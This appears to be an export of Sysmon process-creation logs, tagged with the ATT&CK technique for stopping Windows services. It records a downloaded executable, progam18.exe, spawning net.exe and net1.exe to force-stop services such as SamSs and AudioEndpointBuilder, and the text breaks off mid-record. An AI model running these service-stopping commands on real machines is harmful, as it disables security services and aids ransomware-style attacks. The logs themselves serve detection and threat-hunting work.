+CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:50.769521000Z"",""eventRecordID"":""1229"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:50.728\r\nProcessGuid: {df9fc3d3-d22a-5ec7-0000-0010e43f3f00}\r\nProcessId: 269684\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:50.728"",""processGuid"":""{df9fc3d3-d22a-5ec7-0000-0010e43f3f00}"",""processId"":""269684"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:18.682",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:50.085 +ProcessGuid: {df9fc3d3-d22a-5ec7-0000-001090363f00} +ProcessId: 269020 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:50.126734400Z"",""eventRecordID"":""1228"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:50.085\r\nProcessGuid: {df9fc3d3-d22a-5ec7-0000-001090363f00}\r\nProcessId: 269020\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:50.085"",""processGuid"":""{df9fc3d3-d22a-5ec7-0000-001090363f00}"",""processId"":""269020"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:02.986",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:20.475 +ProcessGuid: {df9fc3d3-d20c-5ec7-0000-0010c0c23c00} +ProcessId: 230284 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d209-5ec7-0000-0010a4903c00} +ParentProcessId: 226656 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:20.528225300Z"",""eventRecordID"":""1194"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:20.475\r\nProcessGuid: {df9fc3d3-d20c-5ec7-0000-0010c0c23c00}\r\nProcessId: 230284\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d209-5ec7-0000-0010a4903c00}\r\nParentProcessId: 226656\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:20.475"",""processGuid"":""{df9fc3d3-d20c-5ec7-0000-0010c0c23c00}"",""processId"":""230284"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d209-5ec7-0000-0010a4903c00}"",""parentProcessId"":""226656"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:40:57.870",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:18.705 +ProcessGuid: {df9fc3d3-d20a-5ec7-0000-0010cda03c00} +ProcessId: 227980 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop 
""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d209-5ec7-0000-0010e9843c00} +ParentProcessId: 225820 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:18.743263600Z"",""eventRecordID"":""1192"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:18.705\r\nProcessGuid: {df9fc3d3-d20a-5ec7-0000-0010cda03c00}\r\nProcessId: 227980\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d209-5ec7-0000-0010e9843c00}\r\nParentProcessId: 225820\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:18.705"",""processGuid"":""{df9fc3d3-d20a-5ec7-0000-0010cda03c00}"",""processId"":""227980"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d209-5ec7-0000-0010e9843c00}"",""parentProcessId"":""225820"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:40:54.181",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:17.652 +ProcessGuid: {df9fc3d3-d209-5ec7-0000-0010a4903c00} +ProcessId: 226656 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:17.672830100Z"",""eventRecordID"":""1191"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:17.652\r\nProcessGuid: {df9fc3d3-d209-5ec7-0000-0010a4903c00}\r\nProcessId: 226656\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:17.652"",""processGuid"":""{df9fc3d3-d209-5ec7-0000-0010a4903c00}"",""processId"":""226656"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:40:54.069",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:17.120 +ProcessGuid: {df9fc3d3-d209-5ec7-0000-0010e9843c00} +ProcessId: 225820 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:17.242013300Z"",""eventRecordID"":""1190"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:17.120\r\nProcessGuid: {df9fc3d3-d209-5ec7-0000-0010e9843c00}\r\nProcessId: 225820\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:17.120"",""processGuid"":""{df9fc3d3-d209-5ec7-0000-0010e9843c00}"",""processId"":""225820"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:40:32.433",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:07.779 +ProcessGuid: {df9fc3d3-d1ff-5ec7-0000-0010057c3b00} +ProcessId: 204716 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1fd-5ec7-0000-001009443b00} +ParentProcessId: 201476 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:07.814769400Z"",""eventRecordID"":""1167"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:07.779\r\nProcessGuid: {df9fc3d3-d1ff-5ec7-0000-0010057c3b00}\r\nProcessId: 204716\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
